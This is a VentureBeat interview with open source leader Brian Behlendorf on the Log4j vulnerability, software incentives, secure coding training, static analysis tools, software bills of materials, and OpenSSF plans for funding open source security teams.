Skip to main content

Open source security leader Brian Behlendorf discusses the impact of Log4j

Security vulnerability Log4J detected. 3d illustration.
Image Credit: style-photography/Getty Images

Join us in Atlanta on April 10th and explore the landscape of security workforce. We will explore the vision, benefits, and use cases of AI for security teams. Request an invite here.


For the last few weeks, the world of computer security has been turned upside down as teams struggled to understand if they needed to worry about the Log4j vulnerability. The relatively small Java library didn’t do anything flashy,  but it was a well-built open source tool for tracking software events, and that made it popular with Java developers. That meant it often found its way into corners that people didn’t expect.

While the security teams will continue to debate the nature of the flaw itself and search for similar problems, many are wondering how this might change the industry’s reliance on open source practices. Everyone enjoys the free tools until a problem like this appears. Is there a deeper issue with open source development that brought this about? Can society continue to rely upon the bounty of open source without changing its expectations and responsibilities?

VentureBeat talked to Brian Behlendorf to understand the depth of the problem and also try to make sense of how software developers can prevent another flaw like this from getting such wide distribution. Behlendorf was one of the original developers of the Apache web servers, and he’s long been a leader of open source development. He’s been working with the Linux Foundation and the Open Source Security Foundation (OpenSSF) to find better practices and support them throughout the open source ecosystem.

 

VB Event

The AI Impact Tour – Atlanta

Continuing our tour, we’re headed to Atlanta for the AI Impact Tour stop on April 10th. This exclusive, invite-only event, in partnership with Microsoft, will feature discussions on how generative AI is transforming the security workforce. Space is limited, so request an invite today.
Request an invite

VentureBeat: Could such a thing happen with closed source, too? 

Brian Behlendorf: Absolutely. There’s no such thing as bug-free software, right? There [are] only bugs that have yet to be discovered.

Obviously, some software receives a lot more scrutiny than other software, but there’s no reason to believe that commercial software proprietary software is any more thoroughly scrutinized than open source software.

VentureBeat: There’s probably not enough scrutiny anywhere, right?

Behlendorf: It’s just not a regular practice for software developers to be asked to go and reread and re-scrutinize old code.  Whether commercial or proprietary. It’s for the same reason you don’t see a lot of scientists repeating old experiments. They’re not rewarded for revisiting old work.

They’re rewarded for adding new features, for doing new work. You’re not rewarded for refactoring old code. You know, this one bit of code that Larry over there wrote? After he left and or quit or whatever, no one’s gone back to revisit it because it seems to work. It seems to pass the tests. And if it’s so thorny and uncommented, we just want to treat it like a black box.

 

VentureBeat: It’s the same situation in open or closed source teams. 

Behlendorf: The incentives, whether in commercial or open source code, really don’t favor going back and looking at this stuff. It often takes, either, disasters like this to convince people to put the effort into [finding] this stuff.

 

VentureBeat: I was working on a project, and we made one filtering feature extra fancy by offering, say, arbitrary regex filtering. The manager said it was ‘too wonderful’ and to “dial it back.” Well, we left the arbitrary regex code in there and just put in a pull-down menu with a few options that, in turn, fed a regex to the backend. I think something similar probably happened here to the Log4j team, right?

Behlendorf: Absolutely. I think in both proprietary and open source code, there’s a tendency to say “yes” when somebody shows up with a code that implements a new feature. There’s an inclination to accept it in order to grow the pool of developers around the project. Let’s err towards saying, “yes” to people who seem like reasonable people.

 

VentureBeat: But then that opens the door to problems, right? 

Behlendorf: Absolutely. Should you have a logging utility parse user-contributed input for formatting, instructions for expansion of stuff into other things? The answer would be, “no.” In fact, this is something that is in our secure coding guide and training materials that we put up on EDX as part of the OpenSSF activity. We specifically recommend against trusting any form of user input. But if your inclination is to say, “yes” until proven wrong to new features, then you’re going to end up with surprises like this.

VentureBeat: But if you start rejecting things, the project also dies, correct? 

Behlendorf: The opposite of this is to say “no” to everything unless it’s thoroughly vetted. That can also be a recipe for obsolescence. A path to where there isn’t any invention or any risk-taking or new features at all. There [are] two ends of a spectrum, and we have to navigate a path between them.

 

VentureBeat: You mentioned some of the courses from OpenSSF. Do you think we can develop the meta procedures to try to catch these kinds of things?

Behlendorf: Definitely. There’s a corpus of knowledge out there about how to write software defensively. And how to be thoughtful about what’s going on below your layers of abstraction that you typically deal with, These are not often part of the computer science education system.  Nor is it certainly a part of the kind of more vocational training. We need to think more about writing coding defensively and writing for a zero-trust environment.

Maybe we need to start expect[ing] people who become maintainers to have either taken a course, like this, or some other somehow prove proficiency in this.

 

VentureBeat: Do you find that it’s possible to do any kind of automation with this? I remember some guys at the OpenBSD group wrote lots of little scripts looking for the basic anti-patterns to avoid.

Behlendorf: Of course, there [are] static analysis tools, and fuzzers. The SAST tools are really designed to try to look for some of these common mistakes. But in the Log4j case, it’s not clear to me that the tools would have caught it. It was kind of an intentionally missed design flaw.  I don’t know of any of them that highlight problematic architectures because that requires almost an AI-level degree of awareness of what the intent of the program was.

 

VentureBeat: Perhaps it could become a bigger part of the infrastructure?

Behlendorf: Yes.  It could be in the long term where, you know, we have started [seeing] AI applied to the system coding. You’ve seen it on GITHUB. They call it but there’s the AI-assisted and kind of software development techniques where it is [thought] of it like AutoComplete but for software development

They tend to cost money to use and that can be one barrier to teams picking it up.

The other problem is a lot of these tools generate a lot of false positives, a lot of things that look like they might be wrong, but actually aren’t. It’s incredibly laborious to go through the false positives to try to sort out what’s actually an issue.   Is this a legit issue or just something that looks amiss?

So one thing we’d like to do at OpenSSF is [work to] figure out, “How do we help with that by perhaps bringing together a common portal for where the reports of these kinds of tools get run?” Software developers who are core to these projects like Log4j can start to separate out false positives. And mark those as, “Don’t bother me with these again,” you know, and try to get some economy of scale. Going rather than lots and lots of different people running these tools and having to independently separate. It’s a hard thing to entirely get right through automation.

Back in May, I believe the White House called for a software bill of materials. Basically, labeling on a software package that tells you what’s inside it. When a new vulnerability comes out, it allows you to quickly figure out what’s inside my deployed software. To say, “Oh here’s where I’m using log4j, even though it was embedded three layers deep inside of some other black box.”

VentureBeat: I’m worried that this makes people even leerier of libraries.  

Behlendorf:  We’ve tended to encourage over atomization in software packages. It’s common to pull in hundreds to thousands of dependencies today. A while ago, there was some library (left pad) that was pulled because someone had some dispute with somebody whether it was around licensing or branding. This caused this downstream ripple effect where Internet services were going down because teams couldn’t push updates to production or when they did things were failing and in brittle ways.

This should wake people up because we need to get serious about security and resiliency in how we do our build and push to production. It would really be helpful to pull these small little bits together into a common platform. Then vet it so everything in her is kept up to date.  So everything in here is designed to work with each other.  I would love to see more focus on getting back to aggregated libraries.

 

VentureBeat: You’ve talked about some new projects coming down the road to address these problems from the OpenSSF. Can you talk about them? 

Behlendorf: We’re still putting the pieces together. For the last year, the project, which is part of the Linux Foundation, which has its members like Microsoft, Google, and a lot of financial services firms, has been focusing on software as a supply chain, right? From original developers through building and incorporating these dependencies out to the end-user, there [are] all these places where there’s a kind of assumptions about how the world works.

What we’ve launched already has been efforts in training for better security on edX.  We’ll start using some of the funding that we’ve been able to acquire to go and do targeted interventions and some of the more critical pieces of infrastructure that’ll be really helpful. Are there ways to do security scans of them that, you know, the static analysis scans, and have somebody come in and do some remediation?

 

VentureBeat: Is there some way to support the projects themselves? 

Behlendorf: We feel that really there hasn’t been much focus on the security teams that place it like Apache, or the Python Foundation or the Node.js Community. Like, How do they operate? How are they resourced? What standards do they adopt? What we’re planning to do is work with those security teams, develop common standards for how to run a security team at an open source project. Maybe find ways to channel funds directly to those teams, so they can be more proactive.

One of the things that open source projects try to do is minimum viable administration. They all try to say, “What’s the least amount of bureaucracy that we can get away with while protecting our hides from a legal point of view?”

That means that the security teams tend to be under-resourced. And it means that they tend to shy away from establishing requirements for things. Like, If you’re a maintainer on a project, have you taken security training, right? Maybe that’s part of the shift that we can help nudge in a certain direction is helping foundations get the resources to be able to better provision security teams. Maybe even with paid security experts on those teams who can go and proactively look for the next Log4j  vulnerability deep in their code. We’ve pulled together a bunch of funding to do some interesting stuff in this domain, and you’ll start to see some announcements soon.

VB Daily - get the latest in your inbox

Thanks for subscribing. Check out more VB newsletters here.

An error occured.